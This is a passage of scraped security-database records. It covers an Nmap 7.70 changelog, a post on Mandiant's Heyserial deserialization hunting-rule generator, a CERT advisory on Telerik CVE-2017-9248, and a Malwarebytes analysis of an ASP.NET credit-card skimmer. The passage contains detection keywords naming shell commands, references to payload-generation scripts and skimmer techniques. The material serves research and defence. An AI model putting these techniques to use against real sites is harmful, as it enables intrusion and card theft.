\u2022 Integrated all of your service/version detection fingerprints submitted\n from March 2017 to August 2017 (728 of them). The signature count went up\n 1.02% to 11,672, including 26 new softmatches. We now detect 1224\n protocols from filenet-pch, lscp, and netassistant to sharp-remote,\n urbackup, and watchguard. We will try to integrate the remaining\n submissions in the next release.\n \n \u2022 Integrated all of your IPv4 OS fingerprint submissions from September\n 2016 to August 2017 (667 of them). Added 298 fingerprints, bringing the new\n total to 5,652. 
Additions include iOS 11, macOS Sierra, Linux 4.14, Android\n 7, and more.\n \n \u2022 Integrated all 33 of your IPv6 OS fingerprint submissions from September\n 2016 to August 2017. New groups for OpenBSD 6.0 and FreeBSD 11.0 were\n added, as well as strengthened groups for Linux and OS X.\n \n \u2022 Added the --resolve-all option to resolve and scan all IP addresses of a\n host. This essentially replaces the resolveall NSE script. [Daniel Miller]\n \n \u2022 [NSE][SECURITY] Nmap developer nnposter found a security flaw (directory\n traversal vulnerability) in the way the non-default http-fetch script\n sanitized URLs. If a user manually ran this NSE script against a malicious\n web server, the server could potentially (depending on NSE arguments used)\n cause files to be saved outside the intended destination directory.\n Existing files couldn't be overwritten. We fixed http-fetch, audited our\n other scripts to ensure they didn't make this mistake, and updated the\n httpspider library API to protect against this by default. [nnposter,\n Daniel Miller]\n \n \u2022 [NSE] Added 9 NSE scripts, from 8 authors, bringing the total up to 588!\n They are all listed at https://nmap.org/nsedoc/, and the summaries are\n below:\n \n - deluge-rpc-brute performs brute-force credential testing against\n Deluge BitTorrent RPC services, using the new zlib library. [Claudiu Perta]\n - hostmap-crtsh lists subdomains by querying Google's Certificate\n Transparency logs. [Paulino Calderon]\n - [GH#892] http-bigip-cookie decodes unencrypted F5 BIG-IP cookies and\n reports back the IP address and port of the actual server behind the\n load-balancer. [Seth Jackson]\n - http-jsonp-detection Attempts to discover JSONP endpoints in web\n servers. JSONP endpoints can be used to bypass Same-origin Policy\n restrictions in web browsers. [Vinamra Bhatia]\n - http-trane-info obtains information from Trane Tracer SC controllers\n and connected HVAC devices. 
[Pedro Joaquin]\n - [GH#609] nbd-info uses the new nbd.lua library to query Network Block\n Devices for protocol and file export information. [Mak Kolybabi]\n - rsa-vuln-roca checks for RSA keys generated by Infineon TPMs\n vulnerable to Return Of Coppersmith Attack (ROCA) (CVE-2017-15361). Checks\n SSH and TLS services. [Daniel Miller]\n - [GH#987] smb-enum-services retrieves the list of services running on a\n remote Windows machine. Modern Windows systems require a privileged domain\n account in order to list the services. [Rewanth Cool]\n - tls-alpn checks TLS servers for Application Layer Protocol Negotiation\n (ALPN) support and reports supported protocols. ALPN largely replaces NPN,\n which tls-nextprotoneg was written for. [Daniel Miller]\n \n \u2022 [GH#978] Fixed Nsock on Windows giving errors when selecting on STDIN.\n This was causing Ncat 7.60 in connect mode to quit with error: libnsock\n select_loop(): nsock_loop error 10038: An operation was attempted on\n something that is not a socket. [nnposter]\n \n \u2022 [Ncat][GH#197][GH#1049] Fix --ssl connections from dropping on\n renegotiation, the same issue that was partially fixed for server mode in\n [GH#773]. Reported on Windows with -e by pkreuzt and vinod272. [Daniel\n Miller]\n \n \u2022 [NSE][GH#1062][GH#1149] Some changes to brute.lua to better handle\n misbehaving or rate-limiting services. Most significantly,\n brute.killstagnated now defaults to true. Thanks to xp3s and Adamtimtim for\n reporting infinite loops and proposing changes.\n \n \u2022 [NSE] VNC scripts now support Apple Remote Desktop authentication (auth\n type 30) [Daniel Miller]\n \n \u2022 [NSE][GH#1111] Fix a script crash in ftp.lua when PASV connection timed\n out. [Aniket Pandey]\n \n \u2022 [NSE][GH#1114] Update bitcoin-getaddr to receive more than one response\n message, since the first message usually only has one address in it. 
[h43z]\n \n \u2022 [Ncat][GH#1139] Ncat now selects the correct default port for a given\n proxy type. [Pavel Zhukov]\n \n \u2022 [NSE] memcached-info can now gather information from the UDP memcached\n service in addition to the TCP service. The UDP service is frequently used\n as a DDoS reflector and amplifier. [Daniel Miller]\n \n \u2022 [NSE][GH#1129] Changed url.absolute() behavior with respect to dot and\n dot-dot path segments to comply with RFC 3986, section 5.2. [nnposter]\n \n \u2022 Removed deprecated and undocumented aliases for several long options that\n used underscores instead of hyphens, such as --max_retries. [Daniel Miller]\n \n \u2022 Improved service scan's treatment of soft matches in two ways. First of\n all, any probes that could result in a full match with the soft matched\n service will now be sent, regardless of rarity. This improves the chances\n of matching unusual services on non-standard ports. Second, probes are now\n skipped if they don't contain any signatures for the soft matched service.\n Previously the probes would still be run as long as the target port number\n matched the probe's specification. Together, these changes should make\n service/version detection faster and more accurate. For more details on\n how it works, see https://nmap.org/book/vscan.html. [Daniel Miller]\n \n \u2022 --version-all now turns off the soft match optimization, ensuring that\n all probes really are sent, even if there aren't any existing match lines\n for the softmatched service. This is slower, but gives the most\n comprehensive results and produces better fingerprints for submission.\n [Daniel Miller]\n \n \u2022 [NSE][GH#1083] New set of Telnet softmatches for version detection based\n on Telnet DO/DON'T options offered, covering a wide variety of devices and\n operating systems. [D Roberson]\n \n \u2022 [GH#1112] Resolved crash opportunities caused by unexpected libpcap\n version string format. 
[Gisle Vanem, nnposter]\n \n \u2022 [NSE][GH#1090] Fix false positives in rexec-brute by checking responses\n for indications of login failure. [Daniel Miller]\n \n \u2022 [NSE][GH#1099] Fix http-fetch to keep downloaded files in separate\n destination directories. [Aniket Pandey]\n \n \u2022 [NSE] Added new fingerprints to http-default-accounts:\n + Hikvision DS-XXX Network Camera and NUOO DVR [Paulino Calderon]\n + [GH#1074] ActiveMQ, Purestorage, and Axis Network Cameras [Rob\n Fitzpatrick, Paulino Calderon]\n \n \u2022 Added a new service detection match for WatchGuard Authentication\n Gateway. [Paulino Calderon]\n \n \u2022 [NSE][GH#1038][GH#1037] Script qscan was not observing interpacket delays\n (parameter qscan.delay). [nnposter]\n \n \u2022 [NSE][GH#1046] Script http-headers now fails properly if the target does\n not return a valid HTTP response. [spacewander]\n \n \u2022 [Ncat][Nsock][GH#972] Remove RC4 from the list of TLS ciphers used by\n default, in accordance with RFC 7465. [Codarren Velvindron]\n \n \u2022 [NSE][GH#1022] Fix a false positive condition in ipmi-cipher-zero caused\n by not checking the error code in responses. Implementations which return\n an error are not vulnerable. [Juho Jokelainen]\n \n \u2022 [NSE][GH#958] Two new libraries for NSE.\n \n - idna - Support for internationalized domain names in applications\n (IDNA)\n - punycode (a transfer encoding syntax used in IDNA) [Rewanth Cool]\n \n \u2022 [NSE] New fingerprints for http-enum:\n \n - [GH#954] Telerik UI CVE-2017-9248 [Harrison Neal]\n - [GH#767] Many WordPress version detections [Rewanth Cool]\n \n \u2022 [GH#981][GH#984][GH#996][GH#975] Fixed Ncat proxy authentication issues\n [nnposter]:\n \n - Usernames and/or passwords could not be empty\n - Passwords could not contain colons\n - SOCKS5 authentication was not properly documented\n - SOCKS5 authentication had a memory leak\n \n \u2022 [GH#1009][GH#1013] Fixes to autoconf header files to allow autoreconf to\n be run. 
[Lukas Schwaighofer]\n \n \u2022 [GH#977] Improved DNS service version detection coverage and consistency\n by using data from a Project Sonar Internet wide survey. Numerous false\n positives were removed and reliable softmatches added. Match lines for\n version.bind responses were also consolidated using the technique below.\n [Tom Sellers]\n \n \u2022 [GH#977] Changed version probe fallbacks so as to work cross protocol\n (TCP/UDP). This enables consolidating match lines for services where the\n responses on TCP and UDP are similar. [Tom Sellers]\n \n \u2022 [NSE][GH#532] Added the zlib library for NSE so scripts can easily handle\n compression. This work started during GSOC 2014, so we're particularly\n pleased to finally integrate it! [Claudiu Perta, Daniel Miller]\n \n \u2022 [NSE][GH#1004] Fixed handling of brute.retries variable. It was being\n treated as the number of tries, not retries, and a value of 0 would result\n in infinite retries. Instead, it is now the number of retries, defaulting\n to 2 (3 total tries), with no option for infinite retries.\n \n \u2022 [NSE] http-devframework-fingerprints.lua supports Jenkins server\n detection and returns extra information when Jenkins is detected [Vinamra\n Bhatia]\n \n \u2022 [GH#926] The rarity level of MS SQL's service detection probe was\n decreased. Now we can find MS SQL in odd ports without increasing version\n intensity. [Paulino Calderon]\n \n \u2022 [GH#957] Fix reporting of zlib and libssh2 versions in \"nmap --version\".\n We were always reporting the version number of the included source, even\n when a different version was actually linked. [Pavel Zhukov]\n \n \u2022 Add a new helper function for nmap-service-probes match lines: $I(1,\">\")\n will unpack an unsigned big-endian integer value up to 8 bytes wide from\n capture 1. The second option can be \"<\" for little-endian. 
[Daniel Miller]\n\n \n \n\n\n[**Download Nmap 7.70**](<https://nmap.org/download.html>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-21T12:25:00", "type": "kitploit", "title": "Nmap 7.70 - Free Security Scanner: Better service and OS detection, 9 new NSE scripts, new Npcap, and much more", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-15361", "CVE-2017-9248"], "modified": "2018-03-21T12:25:06", "id": "KITPLOIT:6757608442546057638", "href": "http://www.kitploit.com/2018/03/nmap-770-free-security-scanner-better.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-12T21:31:10", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96iyLi-WJuKHxzsUe2ew0LLbVkwXkKoWXWpcZ0mRX6YUdBo7uzVq0lxIihLA9awRncMpRG3Pz54Becx4VdqrQLs5gSE0N0eXTFeY3SvASRKmLUj29WSoNXUB9oiczpcdLkgyqQmTBmYpjyy432kXPM87zwjhA7s0hfpa0u5aqBPpNFNzCyggYVI4E/s1882/deserialization1.png>)\n\n \n\n\nProgrammatically create hunting rules for deserialization [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) with multiple\n\n * keywords (e.g. 
cmd.exe)\n * gadget chains (e.g. CommonsCollection)\n * object types (e.g. ViewState, Java, Python Pickle, PHP)\n * encodings (e.g. Base64, raw)\n * rule types (e.g. Snort, Yara)\n\n \n\n\n### Disclaimer\n\nRules generated by this tool are intended for hunting/research purposes and are not designed for high fidelity/blocking purposes.\n\nPlease _test thoroughly_ before deploying to any production systems.\n\nThe Yara rules are primarily intended for scanning web server logs. Some of the \"object prefixes\" are only 2 bytes long, so they can make large scans a bit slow. _(Translation: please don't drop them all into VT Retrohunt.)_\n\n### Usage\n\nHelp: `python3 heyserial.py -h`\n\nExamples:\n \n \n python3 heyserial.py -c 'ExampleChain::condition1+condition2' -t JavaObj python3 heyserial.py -k cmd.exe whoami 'This file cannot be run in DOS mode' python3 heyserial.py -k Process.Start -t NETViewState -e base64 \"base64+utf16le\" \n\n# Utils\n\n### utils/checkyoself.py\n\nThis is a tool to automate bulk testing of Snort and Yara rules on a variety of sample files.\n\nUsage: `python3 checkyoself.py [-y rules.yara] [-s rules.snort] [-o file_output_prefix] [--matches] [--misses] -d malware.exe malware.pcap`\n\nExamples: `python3 checkyoself.py -y rules/javaobj -s rules/javaobj -d payloads/javaobj pcaps --misses -o java_misses`\n\n### utils/generate_payloads.ps1\n\nYSoSerial.NET v1.34 payload generation. Run on Windows from the ./utils directory.\n\n * Source: <https://github.com/pwntester/ysoserial.net>\n * License: ysoserial.net_LICENSE.txt\n\n### utils/generate_payloads.sh\n\nYSoSerial payload generation. 
Run on Linux from the ./utils directory.\n\n * Source: <https://github.com/frohoff/ysoserial>\n * License: ysoserial_LICENSE.txt\n\n### utils/install_snort.sh\n\nInstalling Snort on a Debian based system was a bit finnicky for me, so I wrote my install notes here.\n\n_Use at your own risk _in a VM_ that _you have snapshotted recently_._\n\n### utils/server.py\n\nSimple Python script that runs an HTTP server on 127.0.0.1:12345 and accepts POST requests.\n\nHandy for generating test PCAPs.\n\n# License\n\nCopyright (C) 2021 Alyssa Rahman, Mandiant, Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at: [package root]/LICENSE.txt Unless required by applicable law or agreed to in writing, software [distributed](<https://www.kitploit.com/search/label/Distributed> \"distributed\" ) under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the License for the specific language governing permissions and limitations under the License.\n\n# Contributing\n\nCheck out the Developers' guide (DEVELOPERS.md) for more details on extending HeySerial!\n\n# Prior Work/Related Resources\n\nTools\n\n * [Deserialization-Cheat-Sheet](<https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet> \"Deserialization-Cheat-Sheet\" ) \u2013 @GrrrDog\n * [Ysoserial](<https://github.com/frohoff/ysoserial> \"Ysoserial\" ) \\- @frohoff\n * [MarshalSec](<https://github.com/frohoff/marshalsec> \"MarshalSec\" ) \\- @frohoff\n * [Ysoserial (forked)](<https://github.com/wh1t3p1g/ysoserial> \"Ysoserial \\(forked\\)\" ) \\- @wh1t3p1g\n * [Ysoserial.NET](<https://github.com/pwntester/ysoserial.net> \"Ysoserial.NET\" ) and [v2 branch](<https://github.com/pwntester/ysoserial.net/tree/v2> \"v2 branch\" ) \\- @pwntester\n * [ViewGen](<https://github.com/0xacb/viewgen> \"ViewGen\" ) \u2013 0xacb\n * [Rogue-JNDI](<https://github.com/veracode-research/rogue-jndi> \"Rogue-JNDI\" ) \\- @veracode-research\n\nVulnerabilities\n\n * Log4J ([CVE-2021-44228](<https://www.lunasec.io/docs/blog/log4j-zero-day/> \"CVE-2021-44228\" ))\n * Exchange ([CVE-2021-42321](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42321> \"CVE-2021-42321\" ))\n * Zoho ManageEngine ([CVE-2020-10189](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189> \"CVE-2020-10189\" ))\n * Jira ([CVE-2020-36239](<https://oxalis.io/atlassian-jira-data-centers-critical-vulnerability-what-you-need-to-know/> \"CVE-2020-36239\" ))\n * Telerik ([CVE-2019-18935](<https://bishopfox.com/blog/cve-2019-18935-remote-code-execution-in-telerik-ui> \"CVE-2019-18935\" ))\n * C1 CMS ([CVE-2019-18211](<https://medium.com/@frycos/yet-another-net-deserialization-35f6ce048df7> \"CVE-2019-18211\" ))\n * Jenkins ([CVE-2016-9299](<https://nvd.nist.gov/vuln/detail/CVE-2016-9299> \"CVE-2016-9299\" ))\n * [What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? 
This Vulnerability.](<https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/> \"What Do WebLogic, WebSphere, JBoss, Jenkins, OpenNMS, and Your Application Have in Common? This Vulnerability.\" ) \u2013 @breenmachine, FoxGloveSecurity (2015)\n\nTalks and Write-Ups\n\n * [PSA: Log4Shell and the current state of JNDI injection](<https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/> \"PSA: Log4Shell and the current state of JNDI injection\" ) \\- Moritz Bechler (2021)\n * [This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits](<https://www.mandiant.com/resources/apt41-initiates-global-intrusion-campaign-using-multiple-exploits> \"This is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits\" ) \u2013 Chris Glyer, Dan Perez, Sarah Jones, Steve Miller (2020)\n * [Deep Dive into .NET ViewState deserialization and its exploitation](<https://swapneildash.medium.com/deep-dive-into-net-viewstate-deserialization-and-its-exploitation-54bf5b788817> \"Deep Dive into .NET ViewState deserialization and its exploitation\" ) \u2013 Swapneil Dash (2019)\n * [Exploiting ](<https://soroush.secproject.com/blog/2019/04/exploiting-deserialisation-in-asp-net-via-viewstate/> \"Exploiting\" )[Deserialization](<https://www.kitploit.com/search/label/Deserialization> \"Deserialization\" ) in ASP.NET via ViewState \u2013 Soroush Dalili (2019)\n * [Use of Deserialization in .NET Framework Methods and Classes](<https://research.nccgroup.com/wp-content/uploads/2020/07/whitepaper-new.pdf> \"Use of Deserialization in .NET Framework Methods and Classes\" ) \u2013 Soroush Dalili(2018)\n * [Friday the 13th, JSON Attacks](<https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf> \"Friday the 13th, JSON Attacks\" ) \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2017)\n * [Exploiting .NET Managed 
DCOM](<https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html> \"Exploiting .NET Managed DCOM\" ) \u2013 James Forshaw, Project Zero (2017)\n * [Java Unmarshaller Security](<https://github.com/frohoff/marshalsec/blob/master/marshalsec.pdf> \"Java Unmarshaller Security\" ) \u2013 Moritz Bechler (2017)\n * [Deserialize My Shorts](<https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization> \"Deserialize My Shorts\" ) \u2013 Chris Frohoff (2016)\n * [Pwning Your Java Messaging with Deserialization Vulnerabilities](<https://www.blackhat.com/docs/us-16/materials/us-16-Kaiser-Pwning-Your-Java-Messaging-With-Deserialization-Vulnerabilities-wp.pdf> \"Pwning Your Java Messaging with Deserialization Vulnerabilities\" ) \u2013 Matthias Kaiser (2016)\n * [Journey from JNDI/LDAP ](<https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf> \"Journey from JNDI/LDAP\" )[Manipulation](<https://www.kitploit.com/search/label/Manipulation> \"Manipulation\" ) to [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) Dream Land \u2013 Alvaro Mu\u00f1os and Oleksandr Mirosh (2016)\n * [Marshalling Pickles](<https://www.youtube.com/watch?v=KSA7vUkXGSg> \"Marshalling Pickles\" ) \u2013 Chris Frohoff and Gabriel Lawrence (2015)\n * [Are you my Type? Breaking .NET Through Serialization](<https://github.com/VulnerableGhost/.Net-Sterilized--Deserialization-Exploitation/blob/master/BH_US_12_Forshaw_Are_You_My_Type_WP.pdf> \"Are you my Type? 
Breaking .NET Through Serialization\" ) \u2013 James Forshaw (2012)\n * [A Spirited Peek into ViewState](<https://deadliestwebattacks.com/2011/05/13/a-spirited-peek-into-viewstate-part-i/> \"A Spirited Peek into ViewState\" ) \u2013 Mike Shema (2011)\n\n \n\n\n**Author:** Alyssa Rahman @ramen0x3f\n\n**Created:** 2021-10-27\n\n**Last Updated:** 2021-12-02\n\n**Blog:** <https://www.mandiant.com/resources/hunting-deserialization-exploits>\n\nFor more details on this tool and the research process behind it, check out [our blog](<https://www.mandiant.com/resources/hunting-deserialization-exploits> \"our blog\" )!\n\n \n \n\n\n**[Download Heyserial](<https://github.com/mandiant/heyserial> \"Download Heyserial\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-12T21:30:00", "type": "kitploit", "title": "Heyserial - Programmatically Create Hunting Rules For Deserialization Exploitation With Multiple Keywords, Gadget Chains, Object Types, Encodings, And Rule Types", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299", "CVE-2019-18211", "CVE-2019-18935", "CVE-2020-10189", 
"CVE-2020-36239", "CVE-2021-42321", "CVE-2021-44228"], "modified": "2022-05-12T21:30:00", "id": "KITPLOIT:1207079539580982634", "href": "http://www.kitploit.com/2022/05/heyserial-programmatically-create.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2021-09-28T17:50:45", "description": "### Overview\n\nThe Telerik Web UI, versions R2 2017 (2017.2.503) and prior, is vulnerable to a cryptographic weakness which an attacker can exploit to extract encryption keys.\n\n### Description\n\n[**CWE-326**](<http://cwe.mitre.org/data/definitions/326.html>)**: Inadequate Encryption Strength** \\- CVE-2017-9248\n\nThe `Telerik.Web.UI.dll` is vulnerable to a cryptographic weakness which allows the attacker to extract the `Telerik.Web.UI.DialogParametersEncryptionKey `and/or the `MachineKey`. \nVersions R2 2017 (2017.2.503) and prior are vulnerable. \n \n--- \n \n### Impact\n\nA remote, unauthenticated attacker could perform arbitrary file upload and downloads, cross-site scripting attacks, leak the `MachineKey`, or compromise the ASP.NET ViewState. \nSoftware vendors who use Telerik web components may also be impacted. \n \n--- \n \n### Solution\n\n**Apply an update** \nPlease see the Telerik's [support article](<http://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>) for update information for specific versions. \n \nThe support article also provides information to those who are unable to update their software. \n \n--- \n \n### Vendor Information\n\n838200\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
Click here to view vendors.**\n\n### DotNetNuke Affected\n\nUpdated: July 18, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.dnnsoftware.com/community-blog/cid/155436/critical-security-update--june-2017>\n * <http://www.dnnsoftware.com/community/security/security-center>\n\n### Telerik Affected\n\nUpdated: July 19, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.telerik.com/blogs/security-alert-for-telerik-ui-for-asp.net-ajax-and-progress-sitefinity>\n * <http://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 7.5 | E:ND/RL:ND/RC:ND \nEnvironmental | 5.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References\n\n * <http://www.telerik.com/blogs/security-alert-for-telerik-ui-for-asp.net-ajax-and-progress-sitefinity>\n * <http://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>\n * <http://www.dnnsoftware.com/community-blog/cid/155436/critical-security-update--june-2017>\n * <http://www.dnnsoftware.com/community/security/security-center>\n\n### Acknowledgements\n\nTelerik thanks to Erlend Leiknes, security consultant in Mnemonic AS, and Thanh Van Tien Nguyen for reporting this vulnerability.\n\nThis document was written by Trent Novelly.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-9248](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-9248>) \n---|--- \n**Date Public:** | 2017-06-26 \n**Date First Published:** | 2017-07-25 \n**Date Last Updated: ** | 2017-07-25 14:21 UTC 
\n**Document Revision: ** | 13 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-07-25T00:00:00", "type": "cert", "title": "Telerik Web UI contains cryptographic weakness", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248"], "modified": "2017-07-25T14:21:00", "id": "VU:838200", "href": "https://www.kb.cert.org/vuls/id/838200", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2020-07-09T17:54:09", "description": "**Update: 2020-07-09**\n\n_A reader contacted us with information about this series of attacks on .NET sites. There is a known vulnerability ([CVE-2017-9248](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9248>)) for Telerik UI for ASP.NET that is being exploited. An attacker can upload .aspx web shells and get remote code execution. 
[This Telerik page](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>) offers advice and patches which we strongly recommend website owners apply, in addition to keeping their version of ASP.NET up-to-date._\n\n--\n\nCybercriminals typically focus on targets that can get them the highest return with the least amount of effort. This is often determined by their ability to scale attacks, and therefore on how prevalent a vulnerability or target system is. Enter: the credit card skimmer.\n\nIn the world of digital skimming, we've seen the most activity on e-commerce content management systems (CMSes), such as Magento and plugins like WooCommerce.\n\nHowever, it is important to remember that attackers can and will go after any victim when the opportunity is there. Case in point: The skimmer we describe today has been active in the wild since mid-April, and is targeting websites hosted on Microsoft IIS servers running the ASP.NET web application framework. \n\n### Unusual victims\n\nAs defenders, we tend to focus a lot of our attention on the same platforms, in large part because most of the compromised websites we flag are built on the LAMP (Linux, Apache, MySQL, and PHP) stack. It's not because those technologies are less secure, but simply because they are so widely adopted.\n\nAnd yet, in this campaign, the credit card skimmer is exclusively focused on websites hosted on Microsoft [IIS](<https://www.iis.net/>) servers and running [ASP.NET](<https://dotnet.microsoft.com/apps/aspnet>), Microsoft's web framework to develop web apps and services.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/diagram.png> \"\" )Figure 1: Comparing Linux and Windows based web stacks\n\nWe found over a dozen websites that range from sports organizations, health, and community associations to (oddly enough) a credit union. They have been compromised with malicious code injected into one of their existing JavaScript libraries. 
\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/IIS_ASP.png> \"\" )Figure 2: A snapshot of victim sites with compromised JS libraries\n\nThere doesn't seem to be a specific JS library being targeted, and the code, which we will review later, sometimes takes different forms. However, all the sites we identified were running ASP.NET version 4.0.30319, which is no longer officially supported and contains multiple [vulnerabilities](<https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-2002/version_id-97706/Microsoft-.net-Framework-4.0.html>).\n\nWhile ASP.NET is not as popular as [PHP](<https://www.php.net/>), especially for smaller businesses and personal blogs, it still accounts for a sizable market share and, as one might expect, includes websites running [shopping cart applications](<https://docs.microsoft.com/en-us/aspnet/web-forms/overview/getting-started/getting-started-with-aspnet-45-web-forms/shopping-cart>). All the compromised sites we identified had a shopping portal, and this is exactly what the attackers were after.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/MBAM.png> \"\" )Figure 3: Malwarebytes blocks a domain when visiting an affected portal\n\n### Different types of malicious injection\n\nIn a few instances, the skimmer was loaded remotely. For example, Figure 4 shows a legitimate library where malicious code was appended and obfuscated. It loaded the skimmer from the remote domain thxrq[.]com. The actual file may be named element_main.js, gmt.js, or some other variation.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim3.png> \"\" )Figure 4: Small code injection calls out malicious remote script\n\nHowever, in most cases, we saw the full skimming code being injected directly into the compromised JavaScript library of the affected site. 
There were several different styles that made identification a little challenging.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim2.png> \"\" )Figure 5: Full skimmer injected directly into legitimate script\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/skim1_.png> \"\" )Figure 6: Full obfuscated skimmer injected into legitimate script\n\n### Skimmer triggers on credit card number or password\n\nThis skimmer (source code [here](<https://github.com/MBThreatIntel/skimmers/blob/master/null_gif_skimmer.js>)) is designed to not only look for credit card numbers but also passwords, although the latter appears to be incorrectly implemented. We can see those checks with two different calls for the _match_ method.\n\n[](<https://blog.malwarebytes.com/wp-content/uploads/2020/07/checks_.png> \"\" )Figure 7: Checks for credit card pattern and password\n\nThe data is encoded using an interesting logic. \n\n * _charcodeAt()_ method to return the Unicode of each character contained within the string of each specific field\n * _toString() _method to convert that number to a string\n\nThere's an additional twist in that it groups the resulting combined strings by sets of two 